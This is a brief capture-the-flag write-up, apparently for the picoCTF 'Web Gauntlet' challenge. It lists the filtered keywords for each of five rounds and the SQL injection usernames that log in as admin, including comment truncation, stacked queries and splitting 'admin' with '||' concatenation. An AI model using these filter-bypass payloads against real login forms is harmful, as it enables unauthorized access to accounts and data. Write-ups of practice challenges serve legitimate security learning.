Skip to content

Web Gauntlet

Query executed:

SELECT * FROM users WHERE username='<Username>' AND password='<Password>'

Round 1

Filter: or \ Submit username: admin';--

Round 2

Filter: or and like = --\ Submit username: admin'; SELECT * FROM users WHERE '1

Round 3

Filter: or and like = < > --\ The previous solution should work, but isn't. Checking response in Networks tab of filter.php shows us the actual one \ Filter: <space> or and like = < > --\ Submit username: admin';'1

Round 4

Filter: <space> or and like = < > -- admin\ Submit username: admi'||'n';'1

Round 5

Filter: <space> or and like = < > -- union admin\ Previous one works